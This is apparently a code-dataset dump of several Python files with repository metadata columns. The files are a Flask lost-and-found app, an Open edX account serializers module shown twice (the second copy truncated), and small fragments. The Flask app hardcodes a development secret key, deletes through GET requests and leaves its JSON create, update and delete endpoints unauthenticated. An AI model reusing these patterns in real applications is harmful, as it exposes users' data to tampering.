from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 0
| 0
| 0
|
77675869986e0085d26d2e304c0a479a6582a179
| 4,449
|
py
|
Python
|
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | 13
|
2021-03-14T17:21:09.000Z
|
2021-03-14T17:56:03.000Z
|
app/__init__.py
|
IEEEComputerSocietyUNB/app-perdidos
|
92497b876b5eef874b390ace926c222155e9ceec
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, url_for, request, redirect, send_from_directory, session, flash
from functools import wraps
from .db import init_db
from .models.object import Object
from .controllers.object import ObjectController
from .controllers.user import UserController
from flask import jsonify
| 26.963636
| 105
| 0.612272
|
from flask import Flask, render_template, url_for, request, redirect, send_from_directory, session, flash
from functools import wraps
from .db import init_db
from .models.object import Object
from .controllers.object import ObjectController
from .controllers.user import UserController
from flask import jsonify
def create_app(test_config=None):
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
UPLOAD_FOLDER='/var/www/uploads'
)
from . import database
database.init_app(app)
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash('Nao autorizado, faça o login', 'perigo')
return redirect(url_for('login'))
return wrap
@app.route('/')
def hello():
init_db()
UserController.fill_table()
ObjectController.fill_table()
return redirect(url_for('view_objects'))
@app.route('/users/view', methods=['GET'])
@is_logged_in
def profile():
objs = ObjectController.get_objects_of_user(session['id'])
return render_template('profile/index.html', objs=objs)
@app.route('/objects/create', methods=['GET', 'POST'])
@is_logged_in
def create_object():
if request.method == 'GET':
return render_template('registerObject/index.html')
else:
ObjectController.create(request)
return redirect(url_for('view_objects'))
@app.route('/objects/view', methods=['GET'])
def view_objects():
objs = ObjectController.get_objects()
return render_template('showCase/index.html', objs=objs)
@app.route('/objects/view/<id>', methods=['GET'])
def view_object(id):
obj = ObjectController.get_object(id)
user = UserController.get_user(obj.user_id)
return render_template('objectDetails/index.html', obj=obj, user=user)
@app.route('/objects/update/<id>', methods=['GET', 'POST'])
@is_logged_in
def update_object(id):
obj = ObjectController.get_object(id)
if session['id'] == obj.user_id:
if request.method == 'GET':
return render_template('registerObject/index.html', obj=obj)
else:
obj = ObjectController.update(id, request)
return redirect(url_for('profile'))
else:
return redirect(url_for('profile'))
@app.route('/objects/delete/<id>', methods=['GET'])
@is_logged_in
def delete_object(id):
obj = ObjectController.get_object(id)
if session['id'] == obj.user_id:
obj = ObjectController.delete(id)
return redirect(url_for('profile'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
UserController.login(request)
return redirect(url_for('view_objects'))
return render_template('login/index.html')
@app.route('/logout')
@is_logged_in
def logout():
UserController.logout()
return redirect(url_for('view_objects'))
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method == 'POST':
UserController.create(request)
return redirect(url_for('login'))
return render_template('signUp/index.html')
@app.route('/objects', methods=['GET', 'POST'])
def json_objects_get_or_create():
if request.method == 'POST':
return ObjectController.create(request)
objs = ObjectController.get_objects()
return jsonify(eqtls=[obj.serialize() for obj in objs])
@app.route('/objects/<int:id>', methods=['PUT', 'DELETE'])
def json_object_get_or_update_or_delete(id):
if request.method == 'DELETE':
result = ObjectController.delete(id)
return jsonify(status='success')
else:
return ObjectController.update(id, request)
@app.route('/db_test')
@is_logged_in
def db_test():
database.init_db()
return 'Banco de dados inicializado com sucesso!'
@app.route('/uploads/<filename>')
def upload(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
return app
| 4,115
| 0
| 23
|
77e0586d04fc6b5bd498ff7eda396fdc0f889dc1
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 96
| 96
| 0.895833
|
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 0
| 0
| 0
|
b7060bcb1857418d2ea9deaaa1621e5bdb64a900
| 25,094
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
merged_social_links = new_social_links + pruned_unreplaced_social_links
instance.social_links.all().delete()
instance.social_links.bulk_create(merged_social_links)
except ValueError as err:
# If we have encountered any validation errors, return them to the user.
raise errors.AccountValidationError({
'social_links': {
"developer_message": f"Error when adding new social link: '{str(err)}'",
"user_message": str(err)
}
})
def update(self, instance, validated_data):
"""
Update the profile, including nested fields.
Raises:
errors.AccountValidationError: the update was not attempted because validation errors were found with
the supplied update
"""
language_proficiencies = validated_data.pop("language_proficiencies", None)
# Update all fields on the user profile that are writeable,
# except for "language_proficiencies" and "social_links", which we'll update separately
update_fields = set(self.get_writeable_fields()) - {"language_proficiencies"} - {"social_links"}
for field_name in update_fields:
default = getattr(instance, field_name)
field_value = validated_data.get(field_name, default)
setattr(instance, field_name, field_value)
# Update the related language proficiency
if language_proficiencies is not None:
instance.language_proficiencies.all().delete()
instance.language_proficiencies.bulk_create([
LanguageProficiency(user_profile=instance, code=language["code"])
for language in language_proficiencies
])
# Update the user's social links
requested_social_links = self._kwargs['data'].get('social_links') # lint-amnesty, pylint: disable=no-member
if requested_social_links:
self._update_social_links(instance, requested_social_links)
instance.save()
return instance
class RetirementUserProfileSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of UserProfile data for use in RetirementStatus APIs
"""
class RetirementUserSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of User data for use in RetirementStatus APIs
"""
profile = RetirementUserProfileSerializer(read_only=True)
class RetirementStateSerializer(serializers.ModelSerializer):
"""
Serialize a small subset of RetirementState data for use in RetirementStatus APIs
"""
class UserRetirementStatusSerializer(serializers.ModelSerializer):
"""
Perform serialization for the RetirementStatus model
"""
user = RetirementUserSerializer(read_only=True)
current_state = RetirementStateSerializer(read_only=True)
last_state = RetirementStateSerializer(read_only=True)
class UserSearchEmailSerializer(serializers.ModelSerializer):
"""
Perform serialization for the User model used in accounts/search_emails endpoint.
"""
class UserRetirementPartnerReportSerializer(serializers.Serializer):
"""
Perform serialization for the UserRetirementPartnerReportingStatus model
"""
user_id = serializers.IntegerField()
student_id = serializers.CharField(required=False)
original_username = serializers.CharField()
original_email = serializers.EmailField()
original_name = serializers.CharField()
orgs = serializers.ListField(child=serializers.CharField())
orgs_config = serializers.ListField(required=False)
created = serializers.DateTimeField()
# Required overrides of abstract base class methods, but we don't use them
class PendingNameChangeSerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Serialize the PendingNameChange model
"""
new_name = serializers.CharField()
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
| 39.64297
| 124
| 0.676895
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
class Meta:
model = LanguageProficiency
fields = ("code",)
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
class Meta:
model = SocialLink
fields = ("platform", "social_link")
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def __init__(self, *args, **kwargs):
# Don't pass the 'configuration' arg up to the superclass
self.configuration = kwargs.pop('configuration', None)
if not self.configuration:
self.configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
# Don't pass the 'custom_fields' arg up to the superclass
self.custom_fields = kwargs.pop('custom_fields', [])
super().__init__(*args, **kwargs)
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class Meta:
model = UserPasswordToggleHistory
fields = ("created", "comment", "disabled", "created_by")
def get_created_by(self, user_password_toggle_history):
return user_password_toggle_history.created_by.username
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class Meta:
model = User
fields = ("username", "email", "date_joined", "is_active", "password_toggle_history")
read_only_fields = fields
explicit_read_only_fields = ()
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
class Meta:
model = UserProfile
fields = (
"name", "gender", "goals", "year_of_birth", "level_of_education", "country", "state", "social_links",
"mailing_address", "bio", "profile_image", "requires_parental_consent", "language_proficiencies",
"phone_number"
)
# Currently no read-only field, but keep this so view code doesn't need to know.
read_only_fields = ()
explicit_read_only_fields = ("profile_image", "requires_parental_consent")
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
